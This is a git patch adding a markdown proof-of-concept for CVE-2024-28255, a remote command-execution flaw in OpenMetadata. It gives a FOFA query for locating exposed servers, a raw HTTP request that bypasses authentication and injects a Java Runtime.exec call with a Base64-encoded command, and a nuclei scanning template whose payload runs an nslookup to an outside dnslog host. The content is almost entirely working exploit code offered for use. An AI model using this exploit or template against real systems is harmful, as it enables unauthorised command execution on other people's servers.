From 3bb0519b02b3cbb525012c319bc4b896c845184f Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 14 Apr 2024 19:22:08 +0800
Subject: [PATCH] =?UTF-8?q?Create=20OpenMetadata=E5=91=BD=E4=BB=A4?=
 =?UTF-8?q?=E6=89=A7=E8=A1=8C(CVE-2024-28255).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 OpenMetadata命令执行(CVE-2024-28255).md | 53 +++++++++++++++++++++++++
 1 file changed, 53 insertions(+)
 create mode 100644 OpenMetadata命令执行(CVE-2024-28255).md

diff --git a/OpenMetadata命令执行(CVE-2024-28255).md b/OpenMetadata命令执行(CVE-2024-28255).md
new file mode 100644
index 0000000..108690b
--- /dev/null
+++ b/OpenMetadata命令执行(CVE-2024-28255).md
@@ -0,0 +1,53 @@
+## OpenMetadata命令执行(CVE-2024-28255)
+
+## fofa
+```
+icon_hash="733091897"
+```
+
+## poc
+```
+GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22Base64编码命令%22))) HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Connection: close
+Accept-Encoding: gzip
+```
+
+![78d091e4fbeaf6007c6605c09ff4025d](https://github.com/wy876/POC/assets/139549762/977f9bcb-c7f7-4a73-9918-9c06844c1436)
+
+
+## nuclei POC
+```
+id: CVE-2024-28255
+
+info:
+  name: CVE-2024-28255
+  author: xiaoming
+  severity: high
+  description: OpenMetadata Command Execution
+  metadata:
+    max-request: 1
+    shodan-query: ""
+    verified: true
+
+http:
+- raw:
+  - |+
+    GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgdGVzdC5kbnNsb2cuY24=%22))) HTTP/1.1
+    Host: {{Hostname}}
+    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+    Connection: close
+    Accept-Encoding: gzip
+
+  redirects: true
+  matchers-condition: and
+  matchers:
+  - id: 1
+    type: word
+    part: body
+    words:
+    - "400"
+    - java.lang.ProcessImpl
+    condition: and
+```